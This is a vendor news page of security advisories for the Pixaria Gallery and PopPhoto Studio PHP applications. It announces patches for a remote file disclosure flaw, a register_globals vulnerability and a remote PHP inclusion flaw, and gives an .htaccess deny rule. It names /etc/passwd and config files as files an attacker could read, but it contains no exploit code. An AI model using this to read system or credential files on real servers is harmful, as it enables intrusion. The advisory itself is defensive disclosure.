• About
• Features
• Tech Specs
• Demo Website
• Requirements
• Get Web Hosting
• Get Design Services
• Sell Photos Online

• Further Info
• About Pixaria
• Privacy
• Send E-mail

• Feeds
• Pixaria News
• Documentation
• Twitter

• Works With

Security Patch Updated

Some users (mainly those running Pixaria Gallery on Windows servers) have reported problems with the security patch issued in response to a recent published remote file discovery exploit. For anyone who applied the patch and is having problems with large images not displaying, the file has been updated to fix the issue and can be downloaded here.

For any issues related to the patch, please email me at info@pixaria.com rather than posting in the forums as I check my e-mails far more regularly than the forum.

Pixaria Security Vulnerability

This is an important message about a remote file disclosure exploit which has been discovered in Pixaria Gallery versions 2.0.0 and above. Earlier versions may also be affected and an update will be posted here when this has been confirmed or disproved.

All users of Pixaria 2.0.0 and above are advised to apply the patched file pixaria.image.php immediately to prevent the disclosure of sensitive information from your server to malicious third parties.

Anyone experiencing any issues after applying the patch should contact info@pixaria.com for further assistance.

Further Information

The security exploit in question allows a malicious user to download any file accessible to PHP from a vulnerable Pixaria website. This could include files containing passwords or configuration information such as pixaria.config.php or /etc/passwd. This puts the vulnerability into the high risk category and therefore installation of the patch is recommended without exception.

The patch itself addresses the vulnerability by checking for valid file paths in user submitted data and exiting the script without action in the event of an intrusion attempt.

Further details can be found here: http://www.securityfocus.com/bid/35802

Security Vulnerability Fixed

Users have reported a security vulnerability in Pixaria which can be exploited if PHP's register_globals variable is turned on.

My current advice is for everyone to upgrade to the newly released version 1.4.3 or if that's not possible, to install this patched file: class.Smarty.php.zip into resources/includes on your current installation.

For reference, the installation documentation of Pixaria has been updated with information on how to prevent malicious access to Pixaria's 'include' and 'libraries' scripts as this can easily be prevented by creating a text file called .htaccess with the following text in it:

Order Deny,Allow 
Deny from all 

This file should then be uploaded to:

-/resources/incoming/
-/resources/library/
-/resources/includes/
-/resources/pixies/
-/resources/smarty/

To test whether this is working on your site, browse to these directories using your web browser like this:

http://www.mysite.com/pixaria/resources/includes/

You should get an error message and access denied warning.

PopPhoto Studio security update

PopPhoto Studio has been updated to patch a serious security vulnerability that could leave a server open to being compromised by malicious attackers by using a specially designed URL to include and execute remote PHP code.

Full details of the vulnerability are described in the Secunia security advisory SA SA20087 published on the 15th of May 2006.

The vulnerability only affects servers where the PHP configuration setting register_globals is turned on. PopPhoto does not require this value to be on and all users are advised to turn it off where possible in addition to applying the new security patch.

An updated version of PopPhoto (version 3.6.1) can be downloaded from the PopPhoto version history page which also provides details of the bug and a link to the file change log where you can see which file has been updated.

This security vulnerability is specific to PopPhoto Studio and does not affect Pixaria Gallery.